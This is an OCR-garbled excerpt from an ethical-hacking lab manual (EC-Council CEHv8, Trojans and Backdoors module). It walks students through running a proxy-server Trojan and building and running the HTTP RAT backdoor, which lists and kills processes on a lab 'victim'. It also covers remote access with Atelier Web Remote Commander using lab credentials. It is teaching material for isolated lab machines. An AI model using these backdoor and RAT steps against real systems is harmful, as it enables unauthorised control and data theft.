Internet Connection Required

□ Yes
P latform S upported 0 C lassroom

0 No

0 iLabs

C E H L ab M an u al P age 445

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

Proxy Server Trojan
A. Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a )ray that it can get control and cause damage, such as mining thefile allocation table on a hard drive.
I CON KE Y

Lab Scenario
You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

P~/ Valuable information Test vom‫׳‬ knowledge

Web exercise Workbook review

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor attacks. The objectives o f tins lab include: • • Starting McAfee Proxy Accessing the Internet using McAfee Proxy

m

Lab Environment
To carry out diis, you need:
■ JT Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors McAfee Trojan located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans


A computer running Window Server 2012 (host)
Windows Server 2008 running in virtual machine

If you decide to download the la te st version, then screenshots shown
111 the lab might differ

‫י‬ ‫י‬

You need a web browser to access Internet Administrative privileges to m n tools

Lab Duration
Time: 20 Minutes

C E H L ab M an u al P age 446

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Overview of Trojans and Backdoors
A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die hie allocation table 011 a hard drive.
Note: The versions o f the created cclient or host and appearance may differ from what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab.
£ TASK

Lab Tasks
1. In Windows Server 2008 Virtual Machine, navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types, and right-click Proxy Server Trojans and select CmdHere from die context menu.
jra C > P it E dt |i■ view * C D -v3'‫־‬ teduc05T ro:o‫««־‬nd30ccdo0f3 - "rojanaTypes Toos Vca ‫־‬ s ndp * S 's ® 1 ‫' ״‬ M Sat M w

Proxy server Mcafee

O rgsncc » F pi Documents £ ^ Picture* Mjflic ‫•־‬tore Folders J i R e o srv Mon tor »

N n‫ •״‬- - C * » n o d ri« d M Tvp# j , Bl*d0«rryT'0)jn J( T'0j*tk ,Jf C an ru n d 5h*l "rajjin* J j D*t»c«‫׳‬rw«tT‫׳‬a|arK J f D estruetve Trojans J t Sw oonc Trojans ‫׳יי‬ _±_ J tE - f 'd l r3:3rs Jk F T iro jar J t G J: Trojans JlM TPh-TTFST'O jans JtlO P B d C W o o ‫־‬ j.MACOSXTtoaTS R=nctc A < J t VM C ‫ ־‬raja

| . Startup P'cgrarr* W JA ‫ ־‬rojansT/pes 3ladd>e‫־‬ry Trojan | . Comrrand Srel Trt j . 3ef3GemertTro;a•

COer R»stora previOLS versions S erdT o Q it C30V C‫׳‬e a re 9 xjrtcjt Delete Rename Prooenes ►

1 . 3estrjc&'/e “ rojor
J . -banbrgT-qjarts

1.

Trojers

i . '^ P T 'cjo n i . SUIT'ojans L. -T IP t-rr‫־‬P5 Tro;a I , :CKPBdCkdCOr Proxy Se‫־‬ver Irojf Jg \ \ 35PtOtv TrQ* .. t i n m i G H ‫־‬: ‫ ־־‬.

FIGURE 4.1: Windows Server 2008: CmdHere

2.

Now type die command dir to check for folder contents.

FIGURE 4.2: Directory listing of Proxy Server folder

3. The following image lists die directories and files 111 the folder.

C E H L ab M an u al P age 447

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

-1‫ | ם‬x
|Z :\C E H v 8 M odule 06 T r o j a n s a n d B a c k d o o r s S T r o j a n s T y p e s \P r o x y S e r v e r T r o j a n s > d i r I U o lu n e i n d r i v e Z h a s n o l a b e l . I U o lu n e S e r i a l N um ber i s 1677-7DA C I D i r e c t o r y o f Z :\C E H v8 M odule 06 T r o j a n s a n d B a c k d o o r s V T r o ja n s T y p e s \P r o x y S e r v e I r T r o ja n s 1 0 9 /1 9 /2 0 1 2 1 0 9 /1 9 /2 0 1 2 1 0 2 /1 7 /2 0 0 6 1 0 9 /1 9 /2 0 1 2 0 1 : 0 7 AM <DIR> 0 1 : 0 7 AM <DIR> 1 1 :4 3 AM 5 ,3 2 8 n c a f e e .e x e 0 1 : 0 7 AM <DIR> W 3bPr0xy T r 0 j 4 n C r 3 4 t 0 r <Funny Nane> 1 r Fiill e < ^s s> ; b 5 ,3 ,J 2 8 b y te s 3 D ir < s > 2 0 8 , 2 8 7 ,7 9 3 , 1 5 2 b y t e s f r e e

Z :\C E H v 8 M odule 06 T r o j a n s a n d B a c k d o o r s S T r o j a n s T y p e s \P r o x y S e r v e r T r o j a n s > —

m FIGURE 4.3: Contents in Proxy Server folder

Type die command m cafee 8080 to mil the service 111 Windows Server 2008.

FIGURE 4.4: Starting mcafee tool on port 8080

5. The service lias started 011 port 8080. 6. Now go to Windows Server 2012 host machine and contigure the web browser to access die Internet 011 port 8080. 7. 111 diis lab launch Clirome, and select Settings as shown 111 die following figure.
Q 2 wwwgoogtorofv ■

m Tliis process can be attained in any browser after setting die LAN settings for die respective browser

*

C.pj

lo*r

ico* • O

Google
XjnaNCMm-

1 1 ■ ‫׳‬w ‫״‬n•‫ •״‬...
FIGURE 4.5: Internet option of a browser in Windows Server 2012

C E H L ab M a n u al P age 448

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

8.

Click the Show advanced settings 1111k to view the Internet settings.

FIGURE 4.6: Advanced Settings of Chrome Browser

9.

111 Network Settings, click Change proxy settings.
C 0 chrcyncv/dVOflM.'Mttnpt/
S e ttin g s 4 Enitoir AutaMtc M M l *«Dtom n *u« « c»rt. VUu)tAdofl <nflf(

I Clvotue

9

1

M ttm eric
Gocgit Owcfnt isw9n«y««»ccm^uKrs s>S«m tc connec tc the rctM O rfc.

| OwypwstBnjt-

it
Oownoads

(U Q M thjt w « n >r 1l*nju*9«I w

C ovm laad kcabot: C.'lherrAi rnncti rt A T T to> <i U Ast »hw 10 w «Kt! lit M m dw »«10><«9
M TTPS/SM .

1

0 01

FIGURE 4.7: Changing proxy settings of Chrome Browser

10. 111 die Internet Properties window click LAN settings to configure proxy settings.

C E H L ab M an u al P age 449

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Internet Properties
General [ Security ] Privacy ] Content Connections | Programs ] Advanced

To set up an Internet connection, dick Setup. Dial-up and Virtual Private Network settings

Setup

Choose Settings if you need to configure a proxy server for a connection. (•) Never cfal a connection

O Dial whenever a network connection is not present
O Always dal my default connection Current None Sgt default

Local Area Network (LAN) settings -----------------------------------------------------LAN Settings do not apply to dial-up connections, Choose Settings above for dial-up settings. | LAN settings \

OK

] |

Cancel J

ftpply

FIGURE 4.8: LAN Settings of a Chrome Browser

11. 111 die Local Area Network (LAN) Settings window, select die U se a proxy server for your LAN option 111 the Proxy server section. 12. Enter die IP address o f Windows Server 2008, set die port number to 8080, and click OK.
F T
Local Area Network (LAN) Settings

Automatic configuration
Automatic configuration may override manual settings. To ensure the use o f manual settings, disable automatic configuration. @ Automatically detect settings ‫ ח‬Use automatic configuration script

Address
Proxy server Use a proxy server for your LAN (These settings will not apply to dial-up or VPN connections). Address:

10.0.0.13

Port:

8080

Advanced

I !Bypass proxy server for local addresses!

OK

Cancel

FIGURE 4.9: Proxy settings of LAN in Chrome Browser

13. Now access any web page 111 die browser (example: www.bbc.co.uk).

C E H L ab M an u al P age 450

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

FIGURE 4.10: Accessing web page using proxy server

14. The web page will open. 15. Now go back to Windows Server 2008 and check die command prompt.
A d m in is tra to r C :\W m dow * \s y *te m 3 2 \c m d .e x e - m cafee 8080

m Accessing web page using proxy server

w w w .g o o g le .c o : / c o n p l e t e / s e a r c h ? s u g e x p = c h r o m e ,n o d = 1 8 & c l i e n t = c h ro n e 8 rh l= er :1 2 0 0 . US8rq=bbc. c o - | A c c e p ti n g New R e q u e s ts ■ w w w .g o o g le .c o :1 2 0 0 / c o n p l e te / s e a r c h ? s u g e x p = c h r o m e ,n o d = 1 8 8 t c l i e n t s‫־‬c h ro n e 8 rh l= e n l~ U S & q = b b c .c o .u A c c e p ti n g New R e q u e s ts ! A c c e p ti n g New R e q u e s ts ! A c c e p ti n g New R e q u e ■ * * ‫־‬ ^ / c o n p l e te / s e a r c h ? s u g e x p = c h r o r o e ,n o d = 1 8 8 tc l i e n t = c h ro n e 8 th l= e r l-U S & a = b b c . c o . u k | / :b b c . c o . u k :1 3 0 1 H c c e p ti n g New K e q u e s ts ■ A c c e p ti n g New R e q u e s ts ■ / :w w w .b b c .c o .u k : 1 2 0 0 A c c e p ti n g New R e q u e s ts ! A c c e p ti n g New R e q u e s ts ■ A c c e p ti n g New R e q u e s ts ! A c c e p ti n g New R e q u e s ts ! A c c e p ti n g New R e q u e s ts ■ A c c e p ti n g New R e q u e s ts ! A c c e p ti n g New R e q u e s ts ! s t a t i c . b b c i . c o . u k : / f r a n e w o r k s / b a r l e s q u e / 2 . 1 0 . 0 / d e s k t o p / 3 . 5 / s t y l e / r * a i n . c s s :2 0 0 ! A c c e p ti n g New R e q u e s ts ■ s t a t i c . b b c i . c o . u k : / b b c d o t c o n / 0 . 3 . 1 3 6 / s t y l e / 3 p t _ a d s . c s s :2 0 0 ! A c c e p ti n g New R e q u e s ts ! ________________________________________________________________________

FIGURE 4.11: Background information on Proxy server

16. You can see diat we had accessed die Internet using die proxy server Trojan.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on your target’s searn tv posture and exposure dirough public and tree information.

C E H L ab M an u al P age 451

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M odule 0 6 - T rojans and Backdoors

P L E A S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S R E L A T E D T O T H I S LAB.

T o o l/U tility Proxy Server T ro jan

In fo rm atio n C o llected /O b jectiv es A chieved O u tp u t: Use the proxy server Trojan to access the Internet Accessed webpage: www.bbc.co.uk

Questions
1. Determine whether McAfee HTTP Proxy Server Trojan supports other ports that are also apart from 8080. 2. Evaluate the drawbacks o f using the HTTP proxy server Trojan to access the Internet.

In te rn e t C o n n ectio n R equired 0 Yes P latform S up p o rted 0 C lassroom □ !Labs □ No

C E H L ab M an u al P age 452

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

HTTP Trojan
A. Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a iray that it can get control and cause damage, such as mining thefile allocation table on a hard drive.
ICON KEY

Lab Scenario
Hackers have a variety ot motives for installing malevolent software (malware). This types o f software tends to yield instant access to the system to continuously steal various types o f inform ation from it, for example, strategic company’s designs 01‫ ־‬numbers o f credit cards. A backdoor is a program or a set o f related programs that a hacker installs 011 the victim computer to allow access to the system at a later time. A backdoor’s goal is to remove the evidence o f initial entry from the systems log. Hacker— dedicated websites give examples o f many tools that serve to install backdoors, with the difference that once a connection is established the intruder m ust log 111 by entering a predefined password. You are a Security Administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

/' Valuable information
S

Test your
k n o w led g e_______

*

Web exercise

£Q! Workbook review

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor attacks.
H Tools The objectives o f the lab include: demonstrated in • To run H TTP Trojan 011 Windows Server 2008 this lab are available in • Access the Windows Server 2008 machine process list using the H TTP D:\CEHProxy Tools\CEHv8 Module 06 Trojans • Kill running processes 011 Windows Server 2008 Virtual Machine and Backdoors

Lab Environment
To carry out diis, you need:

C E H L ab M an u al P age 453

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

‫י‬

HTTP RAT located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN


A computer nuining Window Server 2008 (host)
Windows 8 nuniing 111 Virtual Maclune

Windows Server 2008 111 Virtual Machine

■ If you decide to download the la te st version, then screenshots shown 111 the lab might differ ■ ■ You need a web browser to access Internet Administrative privileges to m n tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data 111 such a way diat it can get control and cause damage, such as ruining die file allocation table on a hard dnve.
Note: The versions of die created client or host and appearance may differ from what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab.

Lab Tasks
HTTP RAT

1. Log 111 to Windows 8 Virtual Machine, and select die Start menu by hovering die mouse cursor on die lower-left corner of die desktop,
Rtcytlt Dm

u

a Mo»itla firefox

*

Google Chremr

W indow s 8 Release Previev. ‫■׳‬ > ‫ז‬8‫ח‬ Evaluation copy Build 840C

FIGURE 5.1: Windows 8 Start menu

2.
C E H L ab M an u al P age 454

Click Services ui the Start menu to launch Services.
E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Start

m
Video

m 9
Mozilla Firefox

Google Chrome

.... ‫ י‬5‫י‬
m
Calendar tfecttop

*
Weiner

services

< 3, ■
rm

B
Internet Explorer Uapt

Slcfe

m aS
SfcyD rw e

>PP1:1 ■:he \\" u'.a

^

Wide Web Publisher is mandatory as HTTP RAT runs on port 80

3. Disable/Stop World Wide Web Publishing Services.
File Action View H«Jp

_ .

, ,

FIGURE 5.2: Windows 8 Start menu Apps _

+ 1H1 Ei a HI 0 a l »
Services ;local)
World Wide W eb Pubfahng Service N am e 3 4 ‫־‬W indow s Firewall V/indcv/s Font Cache Service W indow s Im age Acquisitio... W indow s Installer Description: Provides W eb c o m e c tr/rty and adm in s tr a to n th ro u g h th e Interret Infcrm ation Services M anager V W indow s M anagem ent Inst.. •^ W in d o w s M edia Player Net... ‫־‬ ^ W in d o w s M odules Installer £$ V /indcw s Process Activatio... ‫׳‬£ $ W indow s R em ote M anage... W indow s Search W indow s Store Service (W5... W indow s Tim# Q W indow s Update 3% Wired A utoConfig '•& WLAN A utoConfig ■I^WM Perform ance Adapter W orkstation P I W orld W ide W eb Publnhin... - WWAN A utoConfig < Description W indow s F 1.« Optimizes p... Provides im... Adds, modi... Provides a c... Shares Win... Enables inst... T heW indo... W indow s R... Provides CO.Provides inf... M aintains d... Enables t h e ... Running T he W ire d ... The WLANS... Provide; pe.. Cr«at«c and... Provide! W... This service .. Running Running Running Running Running Status Running Running Startup Type A utom atic A utom atic M snu3l M enusl A utom atic M anual M anual M anual M enusl A utom atic (D._ M anual (Tng... M anual (T ng.. M anual (Tng... M anual M anual M anual M anual A utom atic M enusl M anual Net Loc LOC Loc Loc Loc L0C LOC lo c N tt u M LOC v > Loc LOC Net Log A Loc Loc

*%WinHTTP Web Proxy A uto ... WinHTTP i...

\ Mended ^Standard/

FIGURE 5.3: Administrative tools -> Services Window

4. Right-click the World Wide Web Publishing service and select Properties to disable the service.

C E H L ab M an u al P age 455

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

W orld W ide W eb Publishing Service Properties (L o ca l...
Genera1 Log On Service name: Display name: Description: Recovery W3SVC World Wide Web Publishing Service ivides Web connectivity and administration )ugh the Internet Information Services Manager Dependencies

Path to executable: C:\Windows\system32\svchost.exe -k iissvcs Startup type: Disabled

Helo me configure service startup options.

Service status: Start

Stopped Stop
Pause Resume

You can specify the start parameters that apply when you start the service from here Start parameters

OK

Cancel

Apply

FIGURE 5.4: Disable/Stop World Wide Web publishing services

5. N ow start HTTP RAT from die location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN. □
HTTP RAT 0.31

r V 'k H T T P R A T
IUUI The send notification option can be used to send the details to your Mail ID

f -W !backdoor Webserver J by zOmbie
? J

latest version here: [http://freenet.am/~zombie] settings
W

‫ו‬

send notification with ip address to mail

SMTP server 4 sending mail u can specify several servers delimited with ; smtp. mail. ru;$ome. other, smtp. server; your email address: |you@mail.c I.com close FireWalls Create server port: [80" Exit

FIGURE 5.5: HTTP RAT main window

6. Disable die Send notification with ip address to mail option. 7. Click Create to create a httpserver.exe file.

C E H L ab M an u al P age 456

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

HTTP RAT 0.31

E ll

/V K H T T P R A T
I

!backdoor W ebserver
h

if■ •T

J

y 20mbie
v 0 .3 1 1

.
latest version here: [http://freenet.am/~zombie]

seiuriys
send notification with ip address to mail| SMTP server 4 sending mail u can specify several servers delimited with ; | smtp. mail. ru;some. other, smtp. server; your email address: |y ou@mail.com close FireWalls |i Create j| ‫־‬ server port: 1 80 Exit

_

FIGURE 5.6: Create backdoor

HTTP RAT 0.31
0 2 Tlie created httpserver will be placed in the tool directory

I -W ^backdoor Webserver
done!
la done

/V \H T T P RAT

r
c

send http5erver.exe 2 v ic tim

OK

|y ou@mail.com
w

close FireWalls Create

server pork:[ Exit

FIGURE 7.‫כ‬: Backdoor server created successfully

8. Tlie httpserver.exe tile should be created 111 die folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN 9. Double-click the tile to and click Run.

C E H L ab M an u al P age 457

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

A pplication Tool* M om gc

HTTP RAT TROJAN

IS □ * "
Clipboard

BQ New item ‫י‬ Easy access ‫י‬

*

S I O pen ‫י‬ 0 Edit

EE s««t > 1 1
‫ ״ ח‬Select a one □ D Inrert <elert10 n

Im-J Cod / path

0 »«te <harcut |

to *

to • 01

<t) History


Favorites ■ Desktop

I

« HTTP HTIPS Trojans >
N 3m e

Open File ‫ ־‬Security Warning
The publisher could n o t bp v e rifie d . A re you d ir e you w an t t o run t h k softw are? [g j ‫ה־‬N a m e ...TTP HTTPS T rojans\H TTP RAT TRO JA N \httpservcr.cxc U n k n o w n Publisher T ype From: A pplication Z:\CEHv8 M o d u le 06 Trojans a nd B ackdoors J r o j a n s T ‫״‬

Z
|

itt p ia t h tlpscfvcr | ~ Publisher:

4 D ow nloads
* S&l R ecent places

1 . rea d m e ^ Libraries 1111 D o cum ents Music B Pictures

Run

Cancel

g £ Videos This file d o c s n o t have ‫ ג‬valid digital signature th a t verifies its publisher. You sh o u ld only run softw are fro m publishers y o u tr u s t

H o m e g ro u p

^3.

H ewcanIderidew hatto ftiv aretom n ?

T® Computer i l . Local Oslr (C:) 4 - ‫ ׳‬CEH-Tcols (\\10. I p Admin (admin-p
4 item s 1 item selected iO . : KB

FIGURE 5.8: Running the Backdoor

10. Go to Task Manager and check if die process is mnning.
File Options View App history Startup Users Details Services 30% Name Status CPU 52% Memory 4% Disk 0% Network

Processes

Performance

Apps (2)
> > ^ Task Manager Windows Explorer 1.9% 0% 6.8 MB 25.1 MB 0 MB/s 0.1 MB/s 0 Mbps 0 Mbps

Background processes (9)
H Device Association Framework... 0% 0% 0% 0% 19.7% 0% 1.7% 0% 0% 3.3 MB 1.2 MB 4.9 MB 1.0 MB 22.4 MB 19.2 MB 0.9 MB 1.5 MB 0.8 MB 0 MB/s 0 MB/s 0 MB/s 0 MB/s 0.1 MB/s 0 MB/s 0 MB/s 0 MB/s 0 MB/s 0 Mbps 0 Mbps 0 Mbps 0 Mbps 0 Mbps 0 Mbps 0 Mbps 0 Mbps 0 Mbps

S I Httpserver (32 bit) Microsoft Windows Search Inde... tflf' Print driver host for applications m Snagit (32 bit)

j[/) Snagit Editor (32 bit) [■‫ ]־־‬Snagit RPC Helper (32 bit) t> OR) Spooler SubSystem App 0 TechSmith HTML Help Helper (...

W in d o ‫־‬.*;■ ‫־‬. :‫ ־>־׳(־‬ff• ‫־‬, '‫־‬t‫־‬-‫־‬, ~‫ ׳‬: ( * ) Fewer details

FIGURE 5.9: Backdoor running in task manager

11. Go to Windows Server 2008 and open a web browser to access die Windows 8 machine (here “ 10.0.0.12” is die IP address ot Windows 8 Machine).

C E H L ab M an u al P age 458

E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

*Drabe'S KTTP RAT

c | I £« ‫ ״‬iooale
welcome 2 IITTP_RAT infected computer } : ] .es] [brov!6«] [comouter info] [stoo httorat] [have auaaestions?] [homeoace] w p lr n m e }:J

P]

*

D -

FIGURE 5.10: Access the backdoor in Host web browser

12. Click running processes to list the processes running on die Windows 8 machine.
Z>nbe's HTTP_RAT

1,4■ & 10.0.0. iZproc___________

C

? 1 ‫ ־‬ioojle

P

A

E-

running processez:
[system Process] S/stem Ikilll srrss.exe [kill]

w nlogon.exe services.exe f kill] kass.exe [ki!!] ;vchoctoxQ r < n :vcho5t.exe r!<ilfl svchostexe f kiin dvirr.exe Ikilll svchostexe [kill] evehoct.axa [MID :vchost.cxa [UdD

!] v * ‘ninit.exe[M fkilll [M !] 1 ! ,k illl

11 1

svchostexe [h jjj]

M sM p C n g .ex eIk illl » v c .h u s» t.« x «fklin
svchostexe [killl 5vchost.exe [ k iT T j tackho*!f.®x*» [kill] t a c U f i o c t . o x o[ ■ !I]
M p k x a r .t M [ M 1 ]

spoolsv.exe [kilfl svchostexe | kill) svchostexe [kill] d3cHoct.ova f l-illl

searchlndexer.exe fkilfl Snag1t32.exe [joj] TscHelp.exe [kill]
S n a g P r i . / . • * *[k ill] S n a g i t C d i t o r . e x e[I dj]

svchostexe fktlll httpserver.exe (kill] Taskmor.«»x*
f i r o f o xO . X O [ U J J ]

ap lm jv 1 6 4 .ex eIk lll] Ik -illl

FIGURE 5.11: Process list of die victim computer

13. You can kill any running processes from here.

Lab Analysis
Analyze and document the results related to die lab exercise. Give your opinion on your target’s secuntv posture and exposure dirough public and tree mformadon.

C E H L ab M an u al P age 459

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

P L E A S E TALK TO YOUR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB.

T o o l/U tility

In fo rm atio n C o llected /O b jectiv es A chieved Successful send httpserver.exe 011 victim machine O u tp u t: Killed Process System s111ss.exe csrss.exe

H T T P T ro jan

winlogon.exe serv 1ces.exe lsass.exe svchost.exe dwm.exe splwow64.exe httpserver.exe t1retov.exe

Questions
1. Determine the ports that HTTP proxy server Trojan uses to communicate. In tern e t C o n n ectio n R eq u ired

□ Yes
P latform S upported

0 0

No

0

C lassroom

iLabs

C E H L ab M an u al P age 460

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

Remote Access Trojans Using Atelier Web Remote Commander
.4 Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a )), ay that it can get control and cause damage, such as ruining thefie allocation table on a hard drive.
ICON KEY

Lab Scenario
A backdoor Trojan is a very dangerous infection that compromises the integrity o f a computer, its data, and the personal inform ation o f the users. Remote attackers use backdoors as a means o f accessing and taking control o f a computer that bypasses security mechanisms. Trojans and backdoors are types o f bad-wares; their main purpose is to send and receive data and especially commands through a port to another system. This port can be even a wellknown port such as 80 or an out o f the norm ports like 7777. Trojans are most o f the time defaced and shown as legitimate and harmless applications to encourage the user to execute them. You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

/ Valuable information
y 5 Test your

knowledge
T T T T T

Web exercise Workbook review

m

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor JT Tools demonstrated in attacks. this lab are The objectives o f tins lab include: available in D:\CEH• Gain access to a remote computer Tools\CEHv8 • Acquire sensitive information o f the remote computer Module 06 Trojans and Backdoors

Lab Environment
1.

To cany out tins, you need:
Atelier Web Rem ote Commander located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\R em ote A c c e ss Trojans (RAT)\Atelier Web Rem ote Commander

C E H L ab M an u al P age 461

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors


A computer running Window Server 2008 (host)
Windows Server 2003 running in Virtual Machine

■ If you decide to download the la te st version, then screenshots shown 111 the lab might differ ■ You need a web browser to access Internet

■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining the tile allocation table on a hard drive.
Note: The versions of the created client or host and appearance may dilfer from what it is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 diis lab.
a* TASK 1

Lab Tasks
1. Install and launch Atelier Web Rem ote Commander (AWRC) 111 Windows Server 2012. 2. To launch Atelier Web Rem ote Commander (AWRC), launch the Start menu by hovering the mouse cursor on the lower-left corner o f the desktop.
u

Atelier Web Remote Commander

§

■ 3 W indow s Server 2012
s u . t M V M o m S w v w X V ? D M w C M i d M • E v a l u a t o r c g p t .E u d M 0C .r w * 13P M1

FIGURE 6.1: Windows Server 2012 Start-Desktop

3. Click AW Rem ote Commander Professional 111 the Start menu apps.

C E H L ab M an u al P age 462

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Start
C t n v U c r T n f c

Administrator A

*
Took

£
AW fieoiote Connwn..

4

&

FIGURE 6.2: Windows Server 2012 Start Menu Apps

4. The main window o f AWRC will appear as shown 111 the following screenshot.
‫סי‬
File Tools Help Syclnfo Netwarklnfo FJ# Sy*t*fn Uc*rs *nr. Grocpc Chat Desktop

AWRC PRO 9.3.9

‫ט‬ Tliis toll is used to gain access to all the information of die Remote system

Progress Report

y , Connect
df 0 Request ajthonrabor

Disconnect @ dear on iscomect k8psln: 0 Connection Duraton

ffiytesln: C

FIGURE 6.3: Atelier Web Remote Commander main window

5. Input the IP address and Usernam e I Passw ord o f the remote computer. 6. 111 tins lab we have used Windows Server 2008 (10.0.0.13): ■ User name: Administrator ■ Password: qwerty@123
Note: The IP addresses and credentials might differ 111 your labs

7. Click Connect to access the machine remotely.

C E H L ab M an u al P age 463

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

FIGURE 6.4: Providing remote computer details

Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors

8. The following screenshots show that you will be accessing the Windows Server 2008 remotely.
S
File Tools Help
Syslnfo Networidnfb Fie System Use's anc Groups Chat Desktop

10.0.0.13 :AW RC PRO 9.3.9

Internet Explo‫־‬er windows update

j Notepad

< r
& Fastest
Remote Host

~
*T F V *29 Monitors * Progress Report | administrator

#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13

W Connect
c f □ R e q u est a jth o n ia b o r

^

Disconnect

@ Clear on is c o m e c t k B ^ IiL 0 .8 7 Cum cLiim i D uia im i: iMinuce, 42 Seconds.

k5yle*I11; 201.94

FIGURE 6.5: Remote computer Accessed

9. The Commander is connected to the Remote System. Click tlieSys Info tab to view complete details o f the Virtual Machine.

C E H L ab M an u al P age 464

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

FIGURE 6.6: Information of the remote computer

10. Select Networklnfo Path where you can view network information.
S
File Iools Help Syslnfo | NetworiJnfo | Ffe System Use's anc Grocps Chat Desktop

10.0.0.13: AWRC PRO 9.3.9

\
& Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors
ADMINS C$ IPCS

Ports Safeties

\

P /T ra n sp o rt Protocols

Remark Spe . Remote Admin Spe .. Default share Spe .. Remote IPC

Permissions Max Uses net applica... unlimited not applica.. unlimited net applica unlimited

Current Uses

Path

Passwoid not val■ not vali not vaN

Remote Host

Progress Report
#16.28.24 Initializing, please wait #16:28:25 Connected to 10 0.0.13

^
eP

Connect

A / Disconnect
@ dear on iscomect
kSps In: 0.00

D Request ajthonrabor

Ifiy te s ln : 250.93

Connection Duraton: 5 Minutes, 32 Seconds.

FIGURE 6.7: Information of the remote computer

11. Select the File System tab. Select c:\ from the drop-down list and click Get. 12. Tins tab lists the complete files ol the C :\ drive o f Windows Server 2008.

C E H L ab M an u al P age 465

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

